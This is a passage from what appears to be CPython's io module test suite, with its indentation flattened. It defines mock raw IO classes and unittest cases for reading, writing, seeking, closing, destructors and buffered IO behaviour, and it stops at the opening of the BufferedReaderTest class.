IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
if sys.platform == 'OpenVMS' and test in (pipe_reader, pipe_writer):
                    # Pipes are not real pipes on OpenVMS
continue
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
                    # Pipes seem to appear as seekable on Windows and OpenVMS
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin' or sys.platform == 'OpenVMS':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
